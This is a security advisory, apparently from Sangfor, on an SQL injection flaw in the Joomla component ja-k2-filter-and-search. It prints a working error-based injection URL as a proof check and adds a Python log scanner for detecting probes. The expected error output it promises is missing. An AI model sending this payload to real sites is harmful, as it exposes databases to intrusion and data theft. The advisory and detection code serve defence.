SQL Injection Vulnerability in Joomla Component ja-k2-filter-and-search was Discovered

24/10/2016 10:10:12


Summary

In the past couple of days, information security experts discovered an SQL injection vulnerability in the Joomla component ja-k2-filter-and-search.

This component has been used in various Joomla sites. Through the use of the sqlmap tool, an attacker can gain access to the website database and reveal very critical or sensitive data.

This vulnerability has not been detected or published on any international website. In addition, the component developer has not been informed about this critical issue. Therefore, this vulnerability is considered a zero-day vulnerability.

Joomla is a popular open-source Content Management System (CMS). It is written in PHP and uses a MySQL database to store content. It can run on a wide variety of platforms such as Linux, Windows, Mac OS X Server and so on.

Analysis

Proof

A website that uses the Joomla component Ja-K2-Filter-And-Search can be checked for this vulnerability with a specific query.

Enter the following link in the address bar of a web browser:

http://www.xxx.com/index.php?category_id=(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(117),CHAR(82),CHAR(57),CHAR(71),CHAR(65),CHAR(77),CHAR(98),CHAR(77)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&Itemid=135&option=com_jak2filter&searchword=the&view=itemlist&xf_2=5'

If an error occurs as follows, the vulnerability exists:   


Solution

Since no patch has been released by Joomla, website developers should keep a close eye on the updates at the official Joomla website and wait for the patch. Sangfor NGAF customers can rest assured that their websites are well protected against this vulnerability.
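
While no patch is available, site owners can review web server access logs for probes against this component. The following is an added example, not part of the original advisory and not Sangfor or Joomla code. It assumes combined-format access logs, that legitimate category_id values are numeric IDs (optionally comma-separated), and that xf_* values never contain quotes or parentheses; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate category_id values are numeric IDs, optionally comma-separated.
NUMERIC_IDS = re.compile(r"\d+(,\d+)*")
# Assumption: extra-field (xf_*) values never need quotes or parentheses.
XF_SUSPECT = re.compile(r"['\"()]")
# Client address and request target from a combined-format access log line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (.*?) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Oct/2016:10:01:02 +0000] "GET /index.php?option=com_jak2filter'
    '&view=itemlist&category_id=12&searchword=the&Itemid=135 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Oct/2016:10:03:44 +0000] "GET /index.php?category_id='
    '%28select%201%20and%20row%281%2C1%29%29&Itemid=135&option=com_jak2filter'
    '&searchword=the&view=itemlist&xf_2=5%27 HTTP/1.1" 500 812',
    '203.0.113.5 - - [24/Oct/2016:10:05:10 +0000] "GET /index.php?option=com_content'
    '&view=article&id=3 HTTP/1.1" 200 2048',
]

def suspicious_params(target):
    """Return names of com_jak2filter parameters whose decoded values look like probes."""
    query = parse_qs(urlsplit(target).query)  # percent-decodes names and values
    if "com_jak2filter" not in query.get("option", []):
        return []
    hits = set()
    for name, values in query.items():
        base = name.split("[", 1)[0]  # treat category_id[] like category_id
        for value in values:
            if base == "category_id" and not NUMERIC_IDS.fullmatch(value):
                hits.add(name)
            elif base.startswith("xf_") and XF_SUSPECT.search(value):
                hits.add(name)
    return sorted(hits)

def scan(log_lines):
    """Return (client, [parameter names]) for each log line that carries a probe."""
    findings = []
    for line in log_lines:
        match = REQUEST.match(line)
        if match:
            client, target = match.groups()
            params = suspicious_params(target)
            if params:
                findings.append((client, params))
    return findings

if __name__ == "__main__":
    for client, params in scan(SAMPLE_LOG):
        print(f"{client}: suspicious com_jak2filter parameters {params}")
```

A hit together with an HTTP 500 response or a database error in the application log for the same request is worth prioritizing for review.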





COPYRIGHT © 2000-2017 SANGFOR TECHNOLOGIES CO., LTD. ALL RIGHTS RESERVED.